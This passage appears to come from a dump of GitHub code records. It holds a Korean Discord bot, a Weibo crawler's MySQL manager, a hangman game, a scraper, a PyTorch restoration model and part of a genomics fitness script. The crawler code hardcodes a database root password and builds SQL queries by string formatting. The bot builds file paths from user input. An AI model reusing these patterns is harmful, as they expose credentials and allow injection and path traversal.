입력해주세요.\")\nbot = commands.Bot(command_prefix='^^', status=discord.Status.online, activity=game, help_command=None, intents=intents)\nfr = \"^^\"\n\n@bot.event\nasync def on_ready():\n print('다음 봇으로 연결됨:')\n print(bot.user.name)\n print(bot.user.id)\n print('Connected')\n serverlist = []\n memberlist = []\n for guild in bot.guilds:\n serverlist.append(\"**\" + str(guild.name) + \"**`(\" + str(guild.id) + \")`\")\n for i in guild.members:\n if i not in memberlist:\n memberlist.append(i)\n while True:\n await bot.change_presence(activity=discord.Game(\"^^도움말을 입력해주세요.\"), status=discord.Status.online)\n await asyncio.sleep(5)\n await bot.change_presence(activity=discord.Game(str(len(serverlist)) + \"개의 서버\", status=discord.Status.online))\n await asyncio.sleep(5)\n await bot.change_presence(activity=discord.Game(str(len(memberlist)) + \"명의 사용자\", status=discord.Status.online))\n await asyncio.sleep(5)\n \n\n@bot.command(pass_context = True)\nasync def 주사위(ctx):\n randomNum = random.randrange(1, 7)\n if randomNum == 1:\n consequence = discord.Embed(description = ':game_die: ' + ':one:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n if randomNum == 2:\n consequence = discord.Embed(description = ':game_die: ' + ':two:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n if randomNum == 3:\n consequence = discord.Embed(description = ':game_die: ' + ':three:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n if randomNum == 4:\n consequence = discord.Embed(description = ':game_die: ' + ':four:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n if randomNum == 5:\n consequence = discord.Embed(description = ':game_die: ' + ':five:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n if randomNum == 6:\n consequence = discord.Embed(description = ':game_die: ' + ':six:', color = (0xFF6060))\n await ctx.send(embed = consequence)\n\n@bot.command(\"도움\") \nasync def 도움(ctx, arg):\n if arg == \"기타\":\n consequence = discord.Embed(title = 'C-5 기타 도움말', description = '**^^주사위**: C-5가 주사위를 던집니다.' + \n '\\n**^^멈뭄미/엉엉이**: 모든 ㅇ/ㅁ을 ㅁ/ㅇ으로 바꿉니다.' + \n '\\n**^^앵무새**: 말을 따라합니다.' + \n '\\n**^^병든앵무새**: 말을 이상하게 따라합니다.', color = (0xFF6060))\n await ctx.author.send(embed = consequence)\n if arg == \"기본\":\n consequence = discord.Embed(title = 'C-5 기본 도움말', description = '**^^핑**: 핑을 알려줍니다.(ms)\\n**^^계산**: 식을 계산합니다.', color = (0xFF6060))\n await ctx.author.send(embed = consequence)\n\n if arg == \"계산\":\n consequence = discord.Embed(title = 'C-5 계산 도움말', description = '1. 지수는 ^로 표기하세요.(예: 2^3)\\n2. 루트(제곱근)은 sqrt(n)으로 표기하세요.(예: sqrt(144))\\n3. 변수가 숫자가 아닐 때에는 x나 y를 사용해야 합니다.\\n4. 로그(log)는 log(n)으로 표기하세요.(예: log(100))\\n5. 오일러 상수(자연로그의 밑)은 e로 표기하세요.(예: 5e)\\n6. 기타: π는 pi로(예: 2*pi) 표기하세요.(ln은 지원하지 않습니다)', color = (0xFF6060))\n await ctx.author.send(embed = consequence)\n\n@bot.command(\"도움말\")\nasync def 도움말(ctx):\n consequence = discord.Embed(title = 'C-5 도움말', description = '**^^도움 기본**: 기본 도움말을 표시합니다.\\n**^^도움 관리**: 관리 도움말을 표시합니다.\\n**^^도움 기타**: 기타 도움말을 표시합니다.', color = (0xFF6060))\n await ctx.author.send(embed = consequence)\n\n@bot.command(\"버전\")\nasync def 버전(ctx):\n consequence = discord.Embed(title = 'C-5 버전: 1.6.2', description = 'Typhoon Code: Danas', color = (0xFF6060))\n await ctx.send(embed = consequence)\n\n@bot.command(\"서버\")\nasync def 서버(ctx, arg):\n if arg == \"목록\":\n list = []\n for guild in bot.guilds:\n list.append(guild.name)\n consequence = discord.Embed(title = 'C-5 서버 목록', description = '\\n\\n'.join(list) + \"\", color = (0xFF6060))\n await ctx.send(embed = consequence)\n\n@bot.command(\"배워\")\nasync def 배워(ctx, *, arg):\n text = arg\n st = text.split(' ')\n wd = st[0]\n del st[0]\n pmn = st\n mn = \" \".join(pmn)\n if(os.path.isfile(\"C:/Users/user/Desktop/Bot_Dictionary/\" + wd + \".txt\")):\n await ctx.send(\"이미 배운 단어입니다.\")\n return\n else:\n f = open(\"C:/Users/user/Desktop/Bot_Dictionary/\" + wd + \".txt\", \"w\")\n f.write(mn + \"\\n```\" + str(ctx.author) + \" 님이 알려주셨어요!```\")\n f.close()\n await ctx.send(\"단어 \" + wd + \"을(를) 배웠습니다.\")\n return\n\n@bot.command(\"단어\")\nasync def 단어(ctx, *, arg):\n try:\n text = arg\n if(os.path.isfile(\"C:/Users/user/Desktop/Bot_Dictionary/\" + text + \".txt\")):\n f = open(\"C:/Users/user/Desktop/Bot_Dictionary/\" + text + \".txt\", \"r\")\n daneo = f.read()\n f.close()\n await ctx.send(daneo)\n return\n else:\n await ctx.send(\"그게 뭔지 잘 모르겠어요...\")\n return\n except Exception as WASANS:\n await ctx.send(\"오류가 발생했습니다.\\n`\" + str(WASANS) + \"`\")\n \n@bot.command(\"핑\")\nasync def 핑(ctx):\n await ctx.send(f'퐁! {round(bot.latency * 1000)} ms')\n\n@bot.command(\"먹어\")\nasync def 먹어(ctx, *, arg):\n reac = ['*냠냠*', ctx.author.mention + '님, 이걸 먹으라고 주셨어요??', '*(쿰척쿰척)*', '어...갑자기 배불러요 :grinning:', '저기...혹시 드셔보신 건가요?', '**카악 퉷**', '저 급한 약속이 생겼어요! 못 먹어서 죄송해요 ㅎㅎ']\n csq = random.choice(reac)\n await ctx.send(\"음식:`\" + str(arg) + \"`\\n\" + str(csq))\n\n@bot.command(\"공지\")\nasync def 공지(ctx, *, arg):\n channellist = [659072637569597482, 656882081946927166, 634344375845126154]\n amount = 0\n for i in range(len(channellist)):\n amount = amount + 1\n channel = bot.get_channel(channellist[amount])\n if amount > len(channellist):\n break\n if channel:\n embed = discord.Embed(title = 'C-5 공지', description = arg, color = (0xFF6060))\n await channel.send(embed = embed)\n\n@bot.listen()\nasync def on_message(message):\n if message.author.bot:\n return None\n if message.content.startswith(\"\") and message.author.id != 589471081354494012:\n file = openpyxl.load_workbook(\"레벨.xlsx\")\n sheet = file.active\n exp = [100, 300, 600, 1000, 1500, 2100, 2800, 3600, 4500, 5500, 7000, 10000, 15000, 22500, 35000, 99999]\n i = 1\n while True:\n if sheet[\"A\" + str(i)].value == str(message.author.id):\n sheet[\"B\" + str(i)].value = sheet[\"B\" + str(i)].value + 4\n if sheet[\"B\" + str(i)].value >= exp[sheet[\"C\" + str(i)].value]:\n sheet[\"C\" + str(i)].value = sheet[\"C\" + str(i)].value + 1\n embed = discord.Embed(title = ':arrow_up:Level Up!', description = '현재 레벨: ' + str(sheet[\"C\" + str(i)].value) + '\\n현재 경험치: ' + str(sheet[\"B\" + str(i)].value)) \n await message.channel.send(embed = embed)\n file.save(\"레벨.xlsx\")\n break\n\n if sheet[\"A\" + str(i)].value == None:\n sheet[\"A\" + str(i)].value = str(message.author.id)\n sheet[\"B\" + str(i)].value = 0\n sheet[\"C\" + str(i)].value = 1\n file.save(\"레벨.xlsx\")\n\n i += 1\n\n \n\n@bot.command(\"병든앵무새\")\nasync def 병든앵무새(ctx):\n return\n\n@bot.command(\"앵무새\")\nasync def 앵무새(ctx, arg):\n await ctx.send(arg)\n \n\nbot.run('Token')\n \n","repo_name":"TyphoonDANAS/C-5","sub_path":"C-5.py","file_name":"C-5.py","file_ext":"py","file_size_in_byte":8461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17857517247","text":"from wordPair import WordPair\n\nclass Combinator:\n def __init__(self, cb):\n self.cb = cb\n\n get_indexes = lambda self, x, xs: [i for (y, i) in zip(xs, range(len(xs))) if x == y]\n\n def iterate(self, arr):\n self.history = []\n self.result = []\n for index, entity in enumerate(arr):\n for index2, entity2 in enumerate(arr):\n if(index == index2):\n continue\n wPair = WordPair(entity, entity2)\n if(not self.get_indexes(wPair.name, self.history) and not self.get_indexes(wPair.reverseName, self.history)):\n self.result.append(self.cb(wPair))\n self.history.append(wPair.name)\n return self.history\n","repo_name":"NoJuanNobody/crossword-scripts","sub_path":"combinator.py","file_name":"combinator.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40462663374","text":"from twisted.enterprise import adbapi\nimport hashlib\nimport pymysql\n\n\nclass CrawlDatabaseManager:\n\n DB_NAME = 'weibo_crawl'\n\n SERVER_IP = 'localhost'\n\n TABLES = {}\n # create new table, using sql\n TABLES['uids'] = (\n '''CREATE TABLE `uids` (\n `index` int(11) NOT NULL AUTO_INCREMENT,\n `user_id` varchar(32) NOT NULL,\n `status` varchar(11) NOT NULL DEFAULT 'new',\n `queue_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,\n `done_time` timestamp NOT NULL DEFAULT 0 ON UPDATE CURRENT_TIMESTAMP,\n PRIMARY KEY (`index`)\n ) ENGINE=InnoDB\n charset=utf8mb4''')\n\n TABLES['users'] = (\n '''CREATE TABLE `users` (\n `index` int(11) NOT NULL AUTO_INCREMENT,\n `user_id` varchar(32) NOT NULL,\n `name` varchar(32) NOT NULL,\n `followers_count` int(11) NOT NULL,\n `follow_count` int(32) NOT NULL,\n `description` varchar(612) NOT NULL,\n PRIMARY KEY (`index`)\n UNIQUE KEY (`user_id`)\n ) ENGINE=InnoDB\n charset=utf8mb4''')\n\n def __init__(self):\n # connect mysql server\n try:\n cnx = pymysql.Connect(host=self.SERVER_IP, user='root', password='a19970507',charset=\"utf8\")\n \n except pymysql.Error as err:\n if err == pymysql.constants.ER.ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n else:\n print('Create Error ' + err)\n\n\n cursor=cnx.cursor()\n # use database, create it if not exist\n try:\n cnx.select_db(self.DB_NAME)\n except pymysql.Error as err:\n # create database and table\n self.create_database(cursor)\n cnx.select_db(self.DB_NAME)\n self.create_tables(cursor)\n print(\"created database\")\n\n\n finally:\n cursor.close()\n cnx.close()\n\n dbconfig = {\n \"database\": self.DB_NAME,\n \"user\": \"root\",\n \"password\": \"a19970507\",\n \"host\": self.SERVER_IP,\n \"charset\": \"utf8\"\n }\n self.cnxpool =adbapi.ConnectionPool('pymysql',**dbconfig)\n\n\n # create databse\n def create_database(self, cursor):\n try:\n cursor.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8'\".format(self.DB_NAME))\n except pymysql.Error as err:\n print(\"Failed creating database: {}\".format(err))\n exit(1)\n\n def create_tables(self, cursor):\n for name, ddl in self.TABLES.items():\n try:\n cursor.execute(ddl)\n print('Tables created')\n except pymysql.Error as err:\n if err == pymysql.constants.ER.TABLE_EXISTS_ERROR:\n print('create tables error ALREADY EXISTS')\n else:\n print('create tables error ' + str(err))\n\n\n\n # insert user into queue\n def enqueue_user(self, user_id, **kwargs):\n con = self.cnxpool.connect()\n cursor = con.cursor()\n try:\n add_uid = (\"REPLACE INTO uids (user_id) VALUES (%s)\")\n cursor.execute(\"INSERT INTO uids (user_id) VALUES (%s)\"%user_id)\n keys = 'user_id'\n values = (user_id,)\n values_stmt = '%s'\n for key in kwargs:\n keys += ', ' + key\n values_stmt += ', %s'\n values += (kwargs[key],)\n add_user_info = (\"REPLACE INTO users (%s) VALUES \") % (keys)\n add_user_info += '(' + values_stmt + ')'\n\n cursor.execute(add_user_info, values)\n # commit this transaction, please refer to \"mysql transaction\" for more info\n con.commit()\n except pymysql.Error as err:\n print(\"enqueueUrl\" + str(err))\n return\n finally:\n cursor.close()\n\n\n\n # get an user from queue\n def dequeue_user(self):\n con = self.cnxpool.connect()\n cursor = con.cursor()\n try:\n # use select * for update to lock the rows for read\n query = (\"SELECT `index`, `user_id` FROM uids WHERE status='new' ORDER BY `index` ASC LIMIT 1 FOR UPDATE\")\n count=cursor.execute(query)\n if count == 0:\n return None\n row = cursor.fetchone()\n if row is None:\n return None\n update_query = (\"UPDATE uids SET `status`='downloading' WHERE `index`=%d\") % (row[0])\n cursor.execute(update_query)\n con.commit()\n return row\n except pymysql.Error as err:\n print(err)\n return None\n finally:\n cursor.close()\n\n def finish_user(self, index):\n con = self.cnxpool.connect()\n cursor = con.cursor()\n try:\n # we don't need to update done_time using time.strftime('%Y-%m-%d %H:%M:%S') as it's auto updated\n update_query = (\"UPDATE uids SET `status`='done' WHERE `index`=%d\"% (index))\n cursor.execute(update_query)\n con.commit()\n except pymysql.Error as err:\n print(err)\n return\n finally:\n cursor.close()\n\n\nif __name__ == '__main__':\n dbmanager = CrawlDatabaseManager()","repo_name":"zhqu1148980644/TMP","sub_path":"spyder_notes/weibo_secondary/mysql_db_manager.py","file_name":"mysql_db_manager.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"6513964910","text":"import random\n\nprint(\" HANGMAN\")\n\n\ndef start_game():\n start = input(\"If you want play print \\\"Start\\\", else if you want exit print \\\"Exit\\\": \")\n if start == \"Start\" or start == \"start\":\n print(\"\\nThe game started!\")\n game()\n elif start == \"Exit\" or start == \"exit\":\n print(\"You will exit\")\n\n\ndef game():\n code_words = [\"python\", \"java\", \"javascript\", \"php\"]\n word_number = random.randint(0, 3)\n word = list(code_words[word_number])\n length = len(word)\n replaced_word = [\"-\" for letter in word]\n joined_word = (\"\".join(word))\n x = 8\n\n while True:\n print(\"\\n\" + \"\".join(replaced_word))\n letter = str(input(\"Input a letter: \").strip(\"\"))\n letter_len = len(letter)\n if letter.isalpha():\n if letter.islower():\n if letter_len == 1:\n if letter in word:\n for i, c in enumerate(word):\n if letter in replaced_word[i]:\n x -= 1\n print(\"You\\'ve already guessed this letter\")\n continue\n if letter == c:\n replaced_word[i] = letter\n else:\n x -= 1\n print(\"That's letter doesn't appear in the word\")\n else:\n print(\"You should input a single letter\")\n else:\n print(\"Please, input a lowercase English letter\")\n else:\n print(\"Please, input a English letter\")\n if \"-\" not in replaced_word:\n print(\"Your word is: '\" + str(\"\".join(replaced_word)) + \"', and you won!\")\n start_game()\n return\n if x <= 0:\n print(\"You lost!\\n\")\n start_game()\n return\n\n\nstart_game()\n","repo_name":"Savelii-KH/DICT_python_education_Savelii_Khizhnikov","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1769706023","text":"\n'''\ndummy comment\n'''\n\nfrom random import sample\n\ndef simulateCoinFlips( stateSpace = ['H','T'] , requiredLength = 3 ):\n\n coinFlips = []\n for i in range(0,requiredLength):\n coinFlips.append( sample(population=stateSpace,k=1)[0] )\n\n while len(set(coinFlips[len(coinFlips)-requiredLength:])) > 1:\n coinFlips.append( sample(population=stateSpace,k=1)[0] )\n\n output = {\n 'required_length' : requiredLength,\n 'num_of_flips' : len(coinFlips),\n 'coin_flips' : coinFlips\n }\n\n return( output )\n\ndef ex080():\n\n print(\"\\n### ~~~~~ Exercise 080 ~~~~~~~~\");\n\n ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ###\n for i in range(0,10):\n results = simulateCoinFlips( stateSpace = ['A','B','C'], requiredLength = 3 )\n print( results )\n\n ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ###\n return( None )\n\n","repo_name":"paradisepilot/statistics","sub_path":"exercises/programming/stephenson-python-workbook/03-loop/src/Ex080.py","file_name":"Ex080.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"14624083444","text":"from scraper_code.abstract import LINKS, ScrapperLinks\nfrom newspaper import Article\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nclass BounvierLinks(ScrapperLinks):\n def __init__(self, name=\"bounvier\"):\n super().__init__(name)\n self.url_format = \"https://www.bonviveur.es/recetas/{}/\"\n \n def main(self):\n links_all = []\n for page in range(2,110):\n links = self.get_links(page)\n links_all.extend(links)\n print(f\"{page}/109\")\n self.save_batch_links(links_all, page)\n \n def get_links(self, page=None):\n url = self.url_format.format(page)\n soup = self.get_soup(url)\n links = soup.find_all(\"a\", {\"class\": \"title\"})\n links = [link[\"href\"] for link in links]\n return links","repo_name":"Frorozcoloa/ChatCocina","sub_path":"scraper_code/bonviveur/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27603494927","text":"import torch\r\nimport torch.nn as nn\r\nfrom zmq import device\r\nfrom model.core import DWT,IWT\r\nfrom torch.nn import functional as F\r\n\r\nclass DilationBlock(nn.Module):\r\n def __init__(self, in_c, rate_exponent):\r\n super(DilationBlock,self).__init__()\r\n self.dilated_conv_1 = nn.Conv2d(in_c,in_c//2,3,padding='same',dilation= 2**(rate_exponent-1))\r\n self.dilated_conv_2 = nn.Conv2d(in_c,in_c//2,3,padding='same',dilation= 2**(rate_exponent))\r\n self.dilated_conv_3 = nn.Conv2d(in_c,in_c//2,3,padding='same',dilation= 2**(rate_exponent+1))\r\n self.dilated_conv_4 = nn.Conv2d(in_c,in_c//2,3,padding='same',dilation= 2**(rate_exponent+2))\r\n self.conv = nn.Conv2d(in_c*2,in_c,3,padding='same')\r\n\r\n def forward(self,input):\r\n x1 = F.relu(self.dilated_conv_1(input))\r\n x2 = F.relu(self.dilated_conv_2(input))\r\n x3 = F.relu(self.dilated_conv_3(input))\r\n x4 = F.relu(self.dilated_conv_4(input))\r\n x = torch.cat([x1,x2,x3,x4],dim=1)\r\n x = F.relu(self.conv(x))\r\n x = x + input\r\n return x\r\n\r\nclass ResidualDilationBlock(nn.Module):\r\n def __init__(self, num_blocks, num_block_channels, rate_exponent=1):\r\n super(ResidualDilationBlock,self).__init__()\r\n self.blocks = nn.Sequential(*[DilationBlock(num_block_channels,rate_exponent) for i in range(num_blocks)])\r\n\r\n def forward(self,input):\r\n # block_input = input\r\n # for block in self.blocks:\r\n # block_input = block(block_input)\r\n return self.blocks(input)\r\n # return block_input\r\n\r\nclass PALayer(nn.Module):\r\n def __init__(self, channel: int):\r\n super(PALayer, self).__init__()\r\n self.pa = nn.Sequential(\r\n nn.Conv2d(channel, channel // 8, 1, padding=0, bias=True),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(channel // 8, 1, 1, padding=0, bias=True),\r\n nn.Sigmoid(),\r\n )\r\n\r\n def forward(self, x):\r\n y = self.pa(x)\r\n return x * y\r\n\r\n\r\nclass CALayer(nn.Module):\r\n def __init__(self, channel: int):\r\n super(CALayer, self).__init__()\r\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\r\n self.ca = nn.Sequential(\r\n nn.Conv2d(channel, channel // 8, 1, padding=0, bias=True),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(channel // 8, channel, 1, padding=0, bias=True),\r\n nn.Sigmoid(),\r\n )\r\n\r\n def forward(self, x):\r\n y = self.avg_pool(x)\r\n y = self.ca(y)\r\n return x * y\r\n\r\nclass ResidualFFABlock(nn.Module):\r\n def __init__(self, in_c):\r\n super(ResidualFFABlock, self).__init__()\r\n self.conv1 = nn.Conv2d(in_c,in_c,3,padding='same')\r\n self.conv2 = nn.Conv2d(in_c,in_c,3,padding='same')\r\n self.calayer = CALayer(in_c)\r\n self.palayer = PALayer(in_c)\r\n\r\n def forward(self, input):\r\n x = F.relu(self.conv1(input))\r\n y = x + input\r\n x = self.conv2(x)\r\n x = self.palayer(self.calayer(x))\r\n x = x + input\r\n x = F.relu(x)\r\n return x\r\n\r\nclass HQNet(nn.Module):\r\n def __init__(self, in_c,num_block_groups, num_blocks, num_block_channels, rate_exponents=[1,2,3]):\r\n super(HQNet,self).__init__()\r\n assert num_block_groups == len(rate_exponents), \"kernel size should be odd\"\r\n self.conv_1 = nn.Conv2d(in_c,num_block_channels,3,padding='same')\r\n self.block_groups = nn.ModuleList([ResidualDilationBlock(num_blocks, num_block_channels, rate_exponents[i]) for i in range(num_block_groups)])\r\n self.residual = ResidualFFABlock(num_block_channels)\r\n self.gate_conv = nn.Conv2d(num_block_channels * (num_block_groups+1), num_block_groups+1, 3, padding='same',bias=True)\r\n self.conv_2 = nn.Conv2d(num_block_channels, num_block_channels, 3, padding='same')\r\n self.bottleneck_gain = nn.Conv2d(num_block_channels, in_c, 1, padding='same')\r\n self.bottleneck_bias = nn.Conv2d(num_block_channels, in_c, 1, padding='same')\r\n\r\n def forward(self,input):\r\n ga_inputs = [self.conv_1(input)]\r\n for block_group in self.block_groups:\r\n ga_inputs.append(block_group(ga_inputs[-1]))\r\n ga_inputs[-1] = self.residual(ga_inputs[-1])\r\n hq_out = torch.cat(ga_inputs, dim=1)\r\n hq_weighting = self.gate_conv(hq_out)\r\n gated_output = torch.stack([ga_inputs[i]*hq_weighting[:, [i]] for i in range(len(ga_inputs))], dim=1).sum(dim=1)\r\n gated_output = F.relu(self.conv_2(gated_output))\r\n bottleneck_gain = self.bottleneck_gain(gated_output)\r\n bottleneck_bias = self.bottleneck_bias(gated_output)\r\n return bottleneck_gain, bottleneck_bias\r\n\r\nclass DilationPyramid(nn.Module):\r\n def __init__(self, in_c, dilation_rates = [3,2,1,1]):\r\n super(DilationPyramid,self).__init__() \r\n self.dilated_convs = nn.ModuleList([nn.Conv2d(in_c*(i+1), in_c, 3, padding='same',dilation=dilation_rates[i]) for i in range(len(dilation_rates))])\r\n self.bottleneck = nn.Conv2d(in_c*(len(dilation_rates)+1), in_c, 1, padding='same')\r\n\r\n def forward(self,input):\r\n x_in = input\r\n for dilated_conv in self.dilated_convs:\r\n x_out = F.relu(x_in)\r\n x_out = dilated_conv(x_out)\r\n x_in = torch.cat((x_in,x_out), dim=1)\r\n x_out = self.bottleneck(x_in)\r\n x_out = x_out+input\r\n return x_out\r\n\r\nclass PDCRN(nn.Module):\r\n def __init__(self, in_c, block_channels, num_blocks=4, dilation_rates = [7,5,3,2,1]):\r\n super(PDCRN,self).__init__()\r\n self.conv_1 = nn.Conv2d(in_c, block_channels, 3, padding='same')\r\n self.dilation_blocks = nn.ModuleList([DilationPyramid(block_channels, dilation_rates) for i in range(num_blocks)])\r\n self.conv_2 = nn.Conv2d(block_channels*4, block_channels, 3, padding='same')\r\n self.conv_3 = nn.Conv2d(block_channels, block_channels, 3, padding='same')\r\n self.conv_4 = nn.Conv2d(block_channels, 9, 1, padding='same')\r\n self.conv_5 = nn.Conv2d(block_channels, 3, 1, padding='same')\r\n self.upsample_1 = nn.UpsamplingBilinear2d(scale_factor=2)\r\n self.upsample_2 = nn.UpsamplingBilinear2d(scale_factor=2)\r\n\r\n def forward(self,input):\r\n x0 = self.conv_1(input)\r\n x0_act = F.relu(x0)\r\n x1 = self.dilation_blocks[0](x0)\r\n x2 = self.dilation_blocks[0](x1)\r\n x3 = self.dilation_blocks[0](x2)\r\n x4 = self.dilation_blocks[0](x3)\r\n x5 = torch.cat((x1,x2,x3,x4), dim=1)\r\n x5 = F.relu(x5)\r\n x5 = F.relu(self.conv_2(x5))\r\n x_out = x5 + x0_act\r\n x_out = F.relu(self.conv_3(x_out))\r\n x_out_gain = self.upsample_1(self.conv_4(x_out))\r\n x_out_bias = self.upsample_2(self.conv_5(x_out))\r\n # x_out_gain = F.interpolate(self.conv_4(x_out),scale_factor=2, mode='bilenear', align_corners=True)\r\n # x_out_bias = F.interpolate(self.conv_5(x_out),scale_factor=2, mode='bilenear', align_corners=True)\r\n return x_out_gain, x_out_bias\r\n\r\nclass DBWN_D(nn.Module):\r\n def __init__(self,device,num_filters=32):\r\n super(DBWN_D,self).__init__()\r\n self.dwt = DWT()\r\n self.idwt = IWT(device_name=device)\r\n self.hq_net = HQNet(9, 3, 4, num_filters, [1,2,3])\r\n self.lr_net = PDCRN(3, num_filters)\r\n\r\n def forward(self,input):\r\n x = self.dwt(input)\r\n x_lq, x_hq = x[:,:3], x[:,3:]\r\n xhq_gain, xhq_bias = self.hq_net(x_hq)\r\n xhq_gain = torch.cat((x_lq,xhq_gain), dim=1)\r\n xhq_gain = self.idwt(xhq_gain)\r\n xhq_gain = xhq_gain*input\r\n xhq_bias = torch.cat((x_lq,xhq_bias), dim=1)\r\n xhq_bias = self.idwt(xhq_bias)\r\n xhq = xhq_gain+xhq_bias\r\n xlq_gain, xlq_bias = self.lr_net(x_lq)\r\n x_affine = torch.cat(((xlq_gain[:,:3]*xhq).sum(dim=1).unsqueeze(1),\\\r\n (xlq_gain[:,3:6]*xhq).sum(dim=1).unsqueeze(1),\\\r\n (xlq_gain[:,6:]*xhq).sum(dim=1).unsqueeze(1)), dim=1)\r\n x_out = x_affine + xlq_bias\r\n return x_out\r\n\r\n","repo_name":"hrishikeshps94/PDCRN_UDC","sub_path":"model/DBWN_D.py","file_name":"DBWN_D.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12198142042","text":"from pathlib import Path\nfrom scipy import stats\nimport numpy as np\nimport pandas as pd\nimport sys\nimport statsmodels\nimport scipy\n\n\ndef subset_experiment(df, dnaid, exp, col1='experiment', col2='dnaid'):\n '''\n example query string : '(exp==\"TV5490A\") & (dnaid == \"dnaid2023\")'\n '''\n query_string = f'({col1} == \"{exp}\") & ({col2} == \"{dnaid}\")'\n return df.copy().query(query_string)\n\n\ndef calculate_correlation(control_cnts, for_each='sampleID', how='log', cutoff=0.9):\n \"\"\"\n\n Calculate correlation on log counts (log), log counts, but keep 0 (log_w_0), or raw data (raw)\n\n \"\"\"\n\n if how == 'raw':\n col1 = 'conc'\n col2 = 'cnt'\n else:\n control_cnts['logConc'] = np.log10(control_cnts['conc'])\n col1 = 'logConc'\n if how == 'log':\n control_cnts['logCnts'] = np.log10(control_cnts['cnt'])\n elif how == 'log_w_0':\n control_cnts['logCnts'] = np.log10(control_cnts['cnt'].replace({0: 1}))\n col2 = 'logCnts'\n\n corr_df = control_cnts.groupby(['phenotype', for_each])[[col1, col2]].corr()\n corr_df = corr_df.reset_index()\n corr_df = corr_df[corr_df['level_2'] == col1].drop(['level_2', col1], axis=1)\n corr_df.columns = ['phenotype', 'sampleID', 'R']\n\n good_samples = corr_df[(corr_df.R > cutoff) & (corr_df.phenotype == 'wt')].sampleID.values\n return corr_df, good_samples\n\n\n# Filter Data\n\ndef filter_inoculum(exp_df, filter_below=0):\n filt_df = exp_df.copy().pivot(index='barcode', columns='sampleID', values='cnt')\n filt_df = filt_df.fillna(0)\n filt_df = filt_df[(filt_df['inoculum_d0'] >=filter_below)& (filt_df['unenriched_inoculum_d0'] >= filter_below)]\n return filt_df\n\n\ndef filter_samples(exp_df, good_samples):\n return exp_df.copy()[exp_df.sampleID.isin(good_samples)]\n\n\ndef generate_DE_dataset(exp_df, good_samples, filter_below = 1):\n sample_data = exp_df[['sampleID', 'mouse', 'day', 'organ', 'dnaid']].set_index('sampleID').drop_duplicates()\n sample_data = sample_data.loc[sample_data.index.intersection(good_samples)]\n expr_data = filter_samples(exp_df, good_samples)\n expr_data = filter_inoculum(expr_data, filter_below=filter_below)\n expr_data = expr_data[list(sample_data.index)].reset_index()\n return sample_data, expr_data\n\n\ndef write_deseq_dataset(fitness_dir, dnaid, experiment, edf, sdf):\n sdf_file = Path(fitness_dir)/f\"{dnaid}_{experiment}_sdf.csv\"\n edf_file = Path(fitness_dir)/f\"{dnaid}_{experiment}_edf.csv\"\n edf.to_csv(edf_file)\n sdf.to_csv(sdf_file)\n return None\n\n\ndef create_datasets(dnaid, experiment, count_file, control_file, outdir, cutoff, filter_below):\n cnt_data = pd.read_csv(count_file, index_col=0)\n cntrl_data = pd.read_csv(control_file, index_col=0)\n data = pd.concat([cnt_data, cntrl_data])\n exp_cnt = subset_experiment(data, dnaid, experiment)\n cntrl_cnt = subset_experiment(cntrl_data, dnaid, experiment)\n corr_df, good_samples = calculate_correlation(cntrl_cnt, cutoff=cutoff)\n sdf, edf = generate_DE_dataset(exp_cnt, good_samples, filter_below=filter_below)\n #n_samples = sdf.groupby('day').mouse.nunique().to_dict() #to DF\n write_deseq_dataset(outdir, dnaid, experiment, edf, sdf)\n return None\n\n# Run R script\n\n# Compare\n\n\ndef get_fitness_results(fitness_dir, dnaid, experiment):\n fitness = pd.concat([pd.read_table(f, sep=' ').assign(day=f.stem.split(\"_\")[2]) for f in Path(fitness_dir).iterdir() if f\"{dnaid}_{experiment}\" in f.stem])\n #n_samples = pd.read_table\n #fitness['n_samples'] = fitness.day.map(n_samples)\n return fitness\n\n\ndef sigma(lfcSE):\n return np.sqrt(lfcSE.pow(2).sum()) / len(lfcSE)\n\n\ndef calculate_2dist_zscore(u1, s1, u2, s2):\n return (u1 - u2) / np.sqrt((s1 ** 2) + (s2 ** 2))\n\n\ndef calculte_comparisons(fitness, df, controls):\n \"\"\"\n\n fitness: DESeq2 output, log2FoldChange value for each barcode comparing each time point with inoculum\n df: df for 1 experiment and 1 dnaid\n controls: control meta df?\n \"\"\"\n days = list(df['day'].unique())\n days.remove('d0')\n\n # Get all entries that were mapped to a gene\n gene_bc = set(df[df.locus_tag.notnull()].barcode.values)\n gene_df = fitness.loc[fitness.index.intersection(gene_bc)] # subsetting only on barcodes present in fitness table\n # Add gene annotation to the fitness table\n gene_df = gene_df.merge(df[['barcode', 'ShortName']], how='left', on='barcode').drop_duplicates()\n # Calculate mean log2FoldChange and sigma for each gene (for all )\n gene_mean = gene_df.groupby(['ShortName', 'day']).agg({'log2FoldChange': ['mean'], 'lfcSE': 